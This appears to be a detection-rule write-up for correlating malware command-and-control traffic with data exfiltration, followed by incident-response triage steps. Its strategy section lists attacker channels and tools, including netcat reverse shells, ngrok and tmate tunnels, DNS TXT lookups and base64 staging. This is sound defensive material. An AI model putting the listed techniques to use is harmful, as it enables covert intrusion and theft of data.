Goal

Detect malware command and control activity by correlating C2 communication channels with data exfiltration indicators within the same execution context.

Strategy

This correlation rule identifies C2 operations by detecting combinations of the following activity groups:

• Malicious Communication: Outbound connections to C2 infrastructure including IRC channels, P2P malware networks, paste sites, chatrooms, penetration testing domains, ngrok tunnels, DNS TXT lookups, SSH on non-standard ports, reverse shells (netcat), SOCKS5 proxies, and terminal sharing services (tmate)
• Data Exfiltration: Tunneling tools, network exfiltration utilities, file synchronization tools, base64 decoding, or archive creation used to stage and move data out

The rule triggers a high severity signal when both malicious communication and data exfiltration are detected within the same execution context.

Triage & Response

1. Block C2 communications: Immediately block network access to the identified destination IPs and domains, and isolate infected systems.

2. Terminate malware processes: Stop the impacted process(es) on the affected host and container (or pod).

3. Isolate affected systems: Quarantine compromised containers or hosts to prevent further C2 activity and data exfiltration.

4. Assess data exfiltration: Identify what data may have been staged or exfiltrated by reviewing network traffic and file access patterns.

5. Analyze malware artifacts: Extract malware binaries, network indicators, and process arguments for forensic analysis.

6. Hunt for additional infections: Search for other systems with similar C2 indicators across your environment.

7. Investigate initial access: Determine how the malware was deployed and establish the full attack timeline.

8. Implement preventive controls: Deploy network egress filtering for known C2 infrastructure and enhance runtime detection capabilities.